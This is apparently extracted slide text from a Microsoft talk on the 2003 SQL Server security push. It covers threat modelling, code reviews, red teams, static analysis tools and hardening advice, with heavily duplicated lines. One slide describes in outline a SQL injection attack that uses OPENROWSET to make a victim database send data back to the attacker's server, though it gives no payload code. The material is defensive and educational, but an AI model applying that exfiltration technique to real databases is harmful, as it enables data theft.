Security Process & You:SQL Server Case Study
James HamiltonGeneral Manager SQL Server Webdata
Development & Security Architect
AgendaAgenda
Risk Escalating RapidlySQL Injection Demo
Case Study: SQL Server Security PushSQL Server Lessons Learned
Security Tools & AutomationAdmin, Data Protection, & App DesignSummary
Risk Escalating RapidlySQL Injection Demo
Case Study: SQL Server Security PushSQL Server Lessons Learned
Security Tools & AutomationAdmin, Data Protection, & App DesignSummary
Incidents Reported Industry WideIncidents Reported Industry Wide
CERT/CC incident statistics 1988 through 2003Incident: single security issue grouping together all impacts of that that issueIssue: disruption, DOS, loss of data, misuse, damage, loss of confidentiality
CERT/CC incident statistics 1988 through 2003Incident: single security issue grouping together all impacts of that that issueIssue: disruption, DOS, loss of data, misuse, damage, loss of confidentiality
0
10000
20000
30000
4000050000
60000
70000
80000
90000
Source: http://www.cert.org/stats/cert_stats.htmlSource: http://www.cert.org/stats/cert_stats.html
Port ScannersBlack Hat
Community Sharing
Know Your EnemyKnow Your Enemy
Brute Force pwd crackers
Dictionary Based pwd crackers
Network Sniffers
De-compilersDebuggers
Cracker Tools
Data Thief ArchitectureData Thief Architecture
App. Databas
e
App. Databas
e
LocalDB
LocalDB
VulnerableApplicationVulnerableApplication
Attack stringForm values
appended with extra SQL statement
Attack stringForm values
appended with extra SQL statement
SQL-Injected query
Contains an OPENROWSET
statement
SQL-Injected query
Contains an OPENROWSET
statement
SQL injected OPENROWSET statement
causes remote DB to connect back to attackers DB, sending back useful
data
SQL injected OPENROWSET statement
causes remote DB to connect back to attackers DB, sending back useful
data
Girish ChanderSQL Server Security PMGirish ChanderSQL Server Security PM
Data Thief Demonstration
Author: Cesar Cerrudo
Data Thief Demonstration
Author: Cesar Cerrudo
AgendaAgenda
Risk Escalating RapidlySQL Injection Demo
Case Study: SQL Server Security PushSQL Server Lessons Learned
Security Tools & AutomationAdmin, Data Protection, & App Design
SQL Injection Demo
Summary
Risk Escalating RapidlySQL Injection Demo
Case Study: SQL Server Security PushSQL Server Lessons Learned
Security Tools & AutomationAdmin, Data Protection, & App Design
SQL Injection Demo
Summary
Security Push TimelineSecurity Push Timeline
PreparationPreparationPhasePhase
SecurityPush
PushFollow-on
3/15/20033/15/2003 5/1/2035/1/203 8/1/20038/1/2003
Push PreparationPush Preparation•Goal full 800 person team Goal full 800 person team productive from startproductive from start
•Identify ComponentsIdentify Components•Complete threat modelsComplete threat models•Complete EducationComplete Education
•Select push start dateSelect push start date•Security planSecurity plan•Security reps from each teamSecurity reps from each team•Set triage barsSet triage bars•Infrastructure set-upInfrastructure set-up
Security PushSecurity Push•5 million+ lines of code reviewed•Two release in service•One more release in dev•100% team focus during push
•Dev, Test, PM, & UE•No other non-security work
•Three pronged approach:•Targeted code reviews•Tools targeting security•Threat driven reviews & testing
Push Prep: CommunicationsPush Prep: Communications
Learning from other teams’ experiencesWindows, VS .Net, & IIS preceded SQL
Team readiness criticalDon’t start security push until team is prepared
Security push planMotivation, goals, approach, process, fix bar,…
Education plan for teamWeb site set up for general announcements & communication
Learning from other teams’ experiencesWindows, VS .Net, & IIS preceded SQL
Team readiness criticalDon’t start security push until team is prepared
Security push planMotivation, goals, approach, process, fix bar,…
Education plan for teamWeb site set up for general announcements & communication
Push Prep: TrainingPush Prep: Training
Security training for every team memberMandatory training for Architects, PMs, Developers & Testers
Material covered includes:Threat modeling, hacker/cracker tools, black hat community, security development & test tools, attack vectors & defense
Video tape training for new team membersSecurity talks series
more detail on important security related topicsStaying current with evolving threats
On demand webcasts (search on security): <http://www.microsoft.com/usa/webcasts/ondemand/default.asp>
Security training for every team memberMandatory training for Architects, PMs, Developers & Testers
Material covered includes:Threat modeling, hacker/cracker tools, black hat community, security development & test tools, attack vectors & defense
Video tape training for new team membersSecurity talks series
more detail on important security related topicsStaying current with evolving threats
On demand webcasts (search on security): <http://www.microsoft.com/usa/webcasts/ondemand/default.asp>
Push Prep: Infrastructure ReadyPush Prep: Infrastructure ReadyCross component team to drive push
SQL Security Leads
Bug Tracking guidelines detailedClassification of bugs and threats
Separate bug tracking DB for tracking file reviewsTracks code review progress & completeness
Identification of components228 components; Risk level assessed for eachThreat models for each component
Getting security tools running & building skillsClear fix criteria setTracking progress is critical
Cross component team to drive pushSQL Security Leads
Bug Tracking guidelines detailedClassification of bugs and threats
Separate bug tracking DB for tracking file reviewsTracks code review progress & completeness
Identification of components228 components; Risk level assessed for eachThreat models for each component
Getting security tools running & building skillsClear fix criteria setTracking progress is critical
12
Security Push TimelineSecurity Push Timeline
PreparationPreparationPhasePhase
SecurityPush
PushFollow-on
3/15/20033/15/2003 5/1/2035/1/203 8/1/20038/1/2003
Push PreparationPush Preparation•Goal full 800 person team Goal full 800 person team productive from startproductive from start
•Identify ComponentsIdentify Components•Complete threat modelsComplete threat models•Complete EducationComplete Education
•Select push start dateSelect push start date•Security planSecurity plan•Security reps from each teamSecurity reps from each team•Set triage barsSet triage bars•Infrastructure set-upInfrastructure set-up
Security PushSecurity Push•5 million+ lines of code reviewed•Two release in service•One more release in dev•100% team focus during push
•Dev, Test, PM, & UE•No other non-security work
•Three pronged approach:•Targeted code reviews•Tools targeting security•Threat driven reviews & testing
Push: Threat Modeling ProcessPush: Threat Modeling Process
Collect Background Information
Model the System
Determine Threats
Use Scenarios
Implementation Assumptions
External Dependencies
External Security Notes
Internal Security Notes
Entry Points
Assets
Trust Levels
Data Flow Diagrams/Process
Models
Identify Threats
Analyze Threats/Determine
Vulnerabilities
• A process to understand document threats to a systemA process to understand document threats to a system• Methodical and completeMethodical and complete• Describes the system’s threat profileDescribes the system’s threat profile
• Goal is to find design level issues before code is writtenGoal is to find design level issues before code is written
Push: Example Data Flow DiagramPush: Example Data Flow Diagram
Push: Threat ModelingPush: Threat Modeling
Threats must be understood to build secure systemsEvery spec/design goes through threat analysis
Model of component is created (typically a DFD)Threats categorized based on STRIDESeverity ranked based on DREAD
NOT how hard it is to fix
Threats must be understood to build secure systemsEvery spec/design goes through threat analysis
Model of component is created (typically a DFD)Threats categorized based on STRIDESeverity ranked based on DREAD
NOT how hard it is to fix
SS---Spoofing---Spoofing
TT---Tampering of Data---Tampering of Data
RR---Repudiation---Repudiation
II---information Disclosure---information Disclosure
DD---Denial of Service---Denial of Service
EE---Escalation of Privileges---Escalation of Privileges
DD---Damage potential---Damage potential
RR---Reproducibility---Reproducibility
EE---Exploitability---Exploitability
AA---Affected Users---Affected Users
DD---Discoverability---Discoverability
Push: Security SWAT TeamPush: Security SWAT TeamCentral team focused on cross component analysisMembers chosen from different teamsBuild and share security expertiseOverall Approach:
Met on daily basisChoose component based on priority & riskInvite relevant team members for that componentCollectively brainstorm to ferret out cross component threats
Experience: an effective approach:Part of ongoing, regular effort to audit product security
Central team focused on cross component analysisMembers chosen from different teamsBuild and share security expertiseOverall Approach:
Met on daily basisChoose component based on priority & riskInvite relevant team members for that componentCollectively brainstorm to ferret out cross component threats
Experience: an effective approach:Part of ongoing, regular effort to audit product security
Push: Dead Code RemovalPush: Dead Code Removal
Dead code removalCode hygiene & work reductionWhy maintain & review non-executable code?Code in product might be used in future
Dead code detector built from code coverage tool
Analyzes compiled binariesAutomatically files bugs
One bug per fileBug assigned to owner or last modifier
Dead code removalCode hygiene & work reductionWhy maintain & review non-executable code?Code in product might be used in future
Dead code detector built from code coverage tool
Analyzes compiled binariesAutomatically files bugs
One bug per fileBug assigned to owner or last modifier
Push: Code ReviewsPush: Code Reviews
Threat model directed & tools driven reviewsCode review teams set up
Typically, 2 developers and 1 test at leastCode Review driver not code ownerTester files bugs & scribe (some teams rotated roles)
Code Review Experience:Teams progressively became more efficientFirst 90 minutes are the most effectivePass of code by reviewer prior to code review helpedPresentation by code owner was very helpfulAveraged 800-1200 lines reviewed per team per day
Threat model directed & tools driven reviewsCode review teams set up
Typically, 2 developers and 1 test at leastCode Review driver not code ownerTester files bugs & scribe (some teams rotated roles)
Code Review Experience:Teams progressively became more efficientFirst 90 minutes are the most effectivePass of code by reviewer prior to code review helpedPresentation by code owner was very helpfulAveraged 800-1200 lines reviewed per team per day
Push: Analytical Security TestingPush: Analytical Security Testing
Decompose the app (threat model driven)Identify interfacesEnumerate input points
SocketsPipesRegistryFilesRPC (etc)Command-line argsEtc.
Decompose the app (threat model driven)Identify interfacesEnumerate input points
SocketsPipesRegistryFilesRPC (etc)Command-line argsEtc.
Enumerate data structures
C/C++ struct dataHTTP bodyHTTP headersHTTP header dataOther protocol headersQuerystringsBit flags
Attack all data structures, wire formats, and input data
Enumerate data structures
C/C++ struct dataHTTP bodyHTTP headersHTTP header dataOther protocol headersQuerystringsBit flags
Attack all data structures, wire formats, and input data
A Testing method that simulates how A Testing method that simulates how an attacker operatesan attacker operates
Push: Attack TeamPush: Attack Team
Red Team: Microsoft-wide ethical cracking group50-50 split
Reactive: analysis of reported bugsProactive: security reviews
Both formal and informal security reviewsFormal reviews by risk exposureGreater exposure, deeper the review
Analytical Security TestingAdvanced fuzz & data mutation tools developed
Red Team: Microsoft-wide ethical cracking group50-50 split
Reactive: analysis of reported bugsProactive: security reviews
Both formal and informal security reviewsFormal reviews by risk exposureGreater exposure, deeper the review
Analytical Security TestingAdvanced fuzz & data mutation tools developed
21
Security Push TimelineSecurity Push Timeline
PreparationPreparationPhasePhase
SecurityPush
PushFollow-on
3/15/20033/15/2003 5/1/2035/1/203 8/1/20038/1/2003
Push PreparationPush Preparation•Goal full 800 person team Goal full 800 person team productive from startproductive from start
•Identify ComponentsIdentify Components•Complete threat modelsComplete threat models•Complete EducationComplete Education
•Select push start dateSelect push start date•Security planSecurity plan•Security reps from each teamSecurity reps from each team•Set triage barsSet triage bars•Infrastructure set-upInfrastructure set-up
Security PushSecurity Push•5 million+ lines of code reviewed•Two release in service•One more release in dev•100% team focus during push
•Dev, Test, PM, & UE•No other non-security work
•Three pronged approach:•Targeted code reviews•Tools targeting security•Threat driven reviews & testing
Follow-on: What was learned?Follow-on: What was learned?
Set realistic schedulesGet training done before startingInvest in tools early & aggressivelyClearly identify system components earlyCode Reviews:
Provide guidelines & goals for each reviewSecurity focus improved overall system quality
Cross-component interactions better understoodImproved both functional & penetration testing
Define an unambiguous exit criteriaClear progress tracking metrics requiredProcess sometimes interferes with progress
Set realistic schedulesGet training done before startingInvest in tools early & aggressivelyClearly identify system components earlyCode Reviews:
Provide guidelines & goals for each reviewSecurity focus improved overall system quality
Cross-component interactions better understoodImproved both functional & penetration testing
Define an unambiguous exit criteriaClear progress tracking metrics requiredProcess sometimes interferes with progress
AgendaAgenda
Risk Escalating RapidlySQL Injection Demo
Case Study: SQL Server Security PushSQL Server Lessons Learned
Security Tools & AutomationAdmin, Data Protection, & App Design
SQL Injection Demo
Summary
Risk Escalating RapidlySQL Injection Demo
Case Study: SQL Server Security PushSQL Server Lessons Learned
Security Tools & AutomationAdmin, Data Protection, & App Design
SQL Injection Demo
Summary
Development ToolsDevelopment ToolsEngineers good at finding specific vulnerabilities
Innovation required
Not good at reliably finding all instances of a specific bug class
Millions of lines of code
Focus on tools to supplement manual effortsTools that can help identify issues in codeManaged code part of the answer
Development tools used:PREFIX & PREFASTFXCOPCompiler options: /GS, SAFESEHOS Level support: NOEXECUTE
Engineers good at finding specific vulnerabilitiesInnovation required
Not good at reliably finding all instances of a specific bug class
Millions of lines of code
Focus on tools to supplement manual effortsTools that can help identify issues in codeManaged code part of the answer
Development tools used:PREFIX & PREFASTFXCOPCompiler options: /GS, SAFESEHOS Level support: NOEXECUTE
…CHAR buff[MAX_PATH];GetWindowsDirectory(buff, sizeof(buff));SetCurrentDirectory(buff, sizeof(buff));
…CHAR buff[MAX_PATH];GetWindowsDirectory(buff, sizeof(buff));Warning: Failure to check return value
GetWindowsDirectory can fail in low-memory situations
SetCurrentDirectory(buff, sizeof(buff));
…CHAR buff[MAX_PATH];GetWindowsDirectory(buff, sizeof(buff));SetCurrentDirectory(buff, sizeof(buff));
…CHAR buff[MAX_PATH];GetWindowsDirectory(buff, sizeof(buff));Warning: Failure to check return value
GetWindowsDirectory can fail in low-memory situations
SetCurrentDirectory(buff, sizeof(buff));
Sample Prefast DefectSample Prefast Defect
Example Defect ClassesExample Defect Classes
Resource Leakage Leaking Memory/Resource
Pointer Management
Dereferencing NULL pointer Dereferencing invalid pointer Dereferencing or returning
pointer to freed memory
Illegal State Resource in illegal state Illegal value Divide by zero Writing to constant string
Resource Leakage Leaking Memory/Resource
Pointer Management
Dereferencing NULL pointer Dereferencing invalid pointer Dereferencing or returning
pointer to freed memory
Illegal State Resource in illegal state Illegal value Divide by zero Writing to constant string
Memory Management Double frees Freeing pointer to non-allocated
memory (stack, global, etc.) Freeing pointer in middle of
memory block
Initialization Using uninitialized memory Freeing or dereferencing
uninitialized pointer
Bounds violations Overrun & Underrun Failure to validate buffer size
Memory Management Double frees Freeing pointer to non-allocated
memory (stack, global, etc.) Freeing pointer in middle of
memory block
Initialization Using uninitialized memory Freeing or dereferencing
uninitialized pointer
Bounds violations Overrun & Underrun Failure to validate buffer size
• Managed code avoids many of these issues without post-authoring analysis tools
AgendaAgenda
Risk Escalating RapidlySQL Injection Demo
Case Study: SQL Server Security PushSQL Server Lessons Learned
Security Tools & AutomationAdmin, Data Protection, & App DesignSummary
Risk Escalating RapidlySQL Injection Demo
Case Study: SQL Server Security PushSQL Server Lessons Learned
Security Tools & AutomationAdmin, Data Protection, & App DesignSummary
Application & DB AdministrationApplication & DB Administration
Basic security practices:Automated enterprise software inventoryRun MBSA frequentlyApply latest patches Use Windows Update or Software Update Service
Audit authentication success & failures at all tiersCorporate security policy with periodic audit
Senior security Czar with ability to drive change
Emergency response & disaster recovery plansSmall admin group
Min privilege & strong passwords enforced on all
Basic security practices:Automated enterprise software inventoryRun MBSA frequentlyApply latest patches Use Windows Update or Software Update Service
Audit authentication success & failures at all tiersCorporate security policy with periodic audit
Senior security Czar with ability to drive change
Emergency response & disaster recovery plansSmall admin group
Min privilege & strong passwords enforced on all
Data Protection & App. DesignData Protection & App. DesignData Protection:
Hot standby: Clustering, log shipping, or DB Mirroring (Yukon)Frequent backups: Offsite with media encryptionOffline, automated, non-production test systems
Encrypted channels for transferring sensitive informationUse integrated security with strong passwordsIsolate Services
Do not install services on domain controllerServices should run under low privileged accounts (not shared)Mid-tier/data-tier isolation with multiple firewallsSurface area reduction: remove/disable unneeded services
No direct access to data-tierTwo-tier client-side doesn’t work – Security in data tier
Apps that “hide” DB passwords in client tier don’t workAccess only via carefully reviewed mid-tier codeValidate all user input
Data Protection:Hot standby: Clustering, log shipping, or DB Mirroring (Yukon)Frequent backups: Offsite with media encryptionOffline, automated, non-production test systems
Encrypted channels for transferring sensitive informationUse integrated security with strong passwordsIsolate Services
Do not install services on domain controllerServices should run under low privileged accounts (not shared)Mid-tier/data-tier isolation with multiple firewallsSurface area reduction: remove/disable unneeded services
No direct access to data-tierTwo-tier client-side doesn’t work – Security in data tier
Apps that “hide” DB passwords in client tier don’t workAccess only via carefully reviewed mid-tier codeValidate all user input
SummarySummary
Threat profile increasingSQ Security Push case study:
Communication, Training, Infrastructure & tools, Goals & exit criteria
Security Tools and Techniques:Threat models, Security SWAT team, Code reviews, Analytical security testing, Attack Team
Application & DB Admin Data Protection & Application Design
Threat profile increasingSQ Security Push case study:
Communication, Training, Infrastructure & tools, Goals & exit criteria
Security Tools and Techniques:Threat models, Security SWAT team, Code reviews, Analytical security testing, Attack Team
Application & DB Admin Data Protection & Application Design
ResourcesResourcesMicrosoft Security and Privacy site
http://www.microsoft.com/security/
SQL Security White paperhttp://www.microsoft.com/technet/treeview/default.asp?url=/technet/prodtechnol/sql/maintain/security/sp3sec/Default.asp
MBSA Homehttp://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/tools/tools/mbsahome.asp
Microsoft Security and Privacy sitehttp://www.microsoft.com/security/
SQL Security White paperhttp://www.microsoft.com/technet/treeview/default.asp?url=/technet/prodtechnol/sql/maintain/security/sp3sec/Default.asp
MBSA Homehttp://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/tools/tools/mbsahome.asp
TITLETITLE
Microsoft Windows 2000 Security Technical ReferenceMicrosoft Windows 2000 Security Technical Reference
Writing Secure Code, 2/eWriting Secure Code, 2/e
Building Secure Microsoft® ASP.NET Applications Building Secure Microsoft® ASP.NET Applications
Microsoft
Top Related